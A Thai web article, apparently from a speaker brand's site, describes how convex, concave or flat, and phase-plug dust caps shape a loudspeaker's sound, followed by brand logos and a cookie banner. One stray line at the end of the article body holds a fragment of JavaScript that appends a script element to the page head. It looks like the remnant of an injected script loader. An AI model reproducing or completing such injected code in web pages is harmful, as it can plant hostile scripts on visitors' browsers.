Select Page

รูปแบบของดัสแค็ป มีผลต่อคุณภาพเสียงของลำโพงอย่างไร

รูปแบบของดัสแค็ป มีผลต่อคุณภาพเสียงของลำโพงอย่างไร

รูปแบบของดัสแค็ป มีผลต่อคุณภาพเสียงของลำโพงอย่างไร

รูปแบบดัสแค็ปของละโพง…มีผลต่อบุคลิกทางเสียงด้วยนะ…จะบอกให้…ซึ่งใน ปัจจุบัน ได้มีการพัฒนาเทคโนโลยีของ ดัสแค็ป (DUSCAP) ขึ้นมาอย่างหลากหลาย เพื่อช่วยในการกระจายเสียงของลำโพงให้ได้ตามวัตถุประสงค์ของการใช้งาน ซึ่งพอจะสรุปรูปแบบได้ดังนี้…

 • รูปทรงนูน ลักษณะจะเป็นครึ่งวงกลมผ่าครึ่ง และมีเล็กใหญ่ที่แตกต่างกันไป รูปแบบการวางก็คือจะคว่ำ ลงไปกับกรวยลำโพง นิยมใช้เป็นอย่างมากในลำโพงแทบทุกแบรนด์ ข้อดีคือมีการสลายคลื่นสะสม และผลักดันออกไปได้อย่างเหมาะสม ไม่รีดลมเร็วไป และไม่ช้าหรือเปลี่ยนเฟสสัญญาณเสียง สามารถคงรูปได้ดี และรับกำลังขับได้สูง บุคลิกเสียงของลำโพงที่ใช้ดัสแค็ปแบบนี้คือ เสียงที่ได้จะมีความกระชับ ชัดเจน มีความนุ่มนวลพอเหมาะ เสียงไม่โปร่งกระจายออกมาเร็วเกินไป เหมาะสำหรับเสียงที่ต้องการแรงปะทะ และความนุ่มในแบบที่เหมาะสมและพอดี
 • รูปทรงเว้าเข้าหรือแบบนเรียบ รูปทรงนี้เหมือนหรือคล้ายแบบแรก คือมีลักษณะเป็นครึ่งวงกลม แต่เว้า เข้า เหมือนติดหงายเข้าไปกับกรวยลำโพง มีความตื้นลึกที่แตกต่างกัน กับลำโพงบางคู่ก็ใช้เป็นแผ่นเรียบๆธรรมดา มีความแข็งแรงทนกำลังขับ ไม่แตกต่างจากแบบแรก บุคลิกเสียงของลำโพงที่ใช้ดัสแค็ป ลักษณะนี้คือ เสียงกลางต่ำฟังมีพลัง ทุ้มอวบอิ่มนุ่มนวล น้ำหนักเสียงทุ้มแม่นยำชัดเจนดี เสียงไม่บางขาดน้ำหนัก แต่มีการเก็บตัวที่เร็วไป เด่นที่เนื้อเสียง และมีทุ้มที่เชื่อช้าเล็กน้อย เพราะรูปทรงลักษณะนี้มักจะไม่ต้องการให้เสียงตรงกลางกรวยพุ่งออกไปเร็วนัก ไม่ต้องการสลายคลื่นที่กลางกรวยลำโพง เลือกที่จะให้คลื่นเสียงออกไปตามจังหวะเวลาที่ควรจะเป็น
 • รูปทรงเฟสปลั๊ก รูปทรงแบบนี้มีลักษณะที่คล้ายกับหัวกระสุนปืน หรือพีระมิด แล้วแต่ทางผู้ผลิตจะออก แบบ  วัสดุที่ใช้ทำก็แตกต่างกันไปตามการออกแบบลำโพง หากเป็นกระดาษ หรือวัสดุสังเคราะห์ ความทนทานในการใช้งานและการรับกำลังขับ จะสู้พวกที่ใช้โลหะไม่ได้ การรีดเสียงและผลักดันออกไปในช่วงที่มีกำลังขับสูงๆ วัสดุที่เป็นโลหะจะได้เปรียบ เพราะมีความนิ่งและคงรูปที่มากกว่า บุคลิกเสียงของลำโพงที่ใช้ดัสแค็ปลักษณะนี้คือ เสียงมีความรวดเร็ว กระชับ ฉับไว เก็บตัวดีไม่บวมเบลอ มีแรงปะทะของเสียงที่ชัดเจนเด็ดขาด เสียงกระจายออกมาได้ดีมาก ไม่มีอับทึบ ไม่พร่ามัว มีความชัดเจนในน้ำเสียง โดยเพาะเสียงกลางที่มีความโปร่งชัดของเสียงร้องได้ชัดเจนดีมาก

ลักษณะ ของดัสแค็ปที่ส่งผลต่อบุคลิกเสียงนั้น เป็นความหมายโดยรวม บุคลิกเสียงจะแตกต่างกันไปอีกบ้างถามรูปแบบการผลิตของลำโพง ลวดลายและวัสดุที่ใช้ผสม ฉะนั้นการดูรูปแบบของดัสแค็ปจึงเป็นอีกวิธีที่สามารถรู้บุคลิกเสียงคร่าวๆ ได้ 20120604014848-1717530835d.getElementsByTagName(‘head’)[0].appendChild(s);

honor_jpeg   mb_jpeg   johnnie_jpeg   judge_jpeg   maxma-2_jpeg   konrukdee_jpeg   ma_jpeg   gip_jpeg   exad_jpeg   option_jpeg   adison_jpeg   xcaliber_jpeg   rifle_jpeg   lefven_jpeg   cube_jpeg   kingdom_jpeg   ssf_jpeg   mafia_jpeg   taurus_jpeg

เราใช้คุกกี้เพื่อพัฒนาประสิทธิภาพ และประสบการณ์ที่ดีในการใช้เว็บไซต์ของคุณ คุณสามารถศึกษารายละเอียดได้ที่ นโยบายความเป็นส่วนตัว และสามารถจัดการความเป็นส่วนตัวเองได้ของคุณได้เองโดยคลิกที่ ตั้งค่า

Privacy Preferences

คุณสามารถเลือกการตั้งค่าคุกกี้โดยเปิด/ปิด คุกกี้ในแต่ละประเภทได้ตามความต้องการ ยกเว้น คุกกี้ที่จำเป็น

Allow All
Manage Consent Preferences
 • คุกกี้ที่จำเป็น
  Always Active

  ประเภทของคุกกี้มีความจำเป็นสำหรับการทำงานของเว็บไซต์ เพื่อให้คุณสามารถใช้ได้อย่างเป็นปกติ และเข้าชมเว็บไซต์ คุณไม่สามารถปิดการทำงานของคุกกี้นี้ในระบบเว็บไซต์ของเราได้

 • คุกกี้เพื่อการวิเคราะห์

  คุกกี้ประเภทนี้จะทำการเก็บข้อมูลการใช้งานเว็บไซต์ของคุณ เพื่อเป็นประโยชน์ในการวัดผล ปรับปรุง และพัฒนาประสบการณ์ที่ดีในการใช้งานเว็บไซต์ ถ้าหากท่านไม่ยินยอมให้เราใช้คุกกี้นี้ เราจะไม่สามารถวัดผล ปรับปรุงและพัฒนาเว็บไซต์ได้

Save
%d bloggers like this: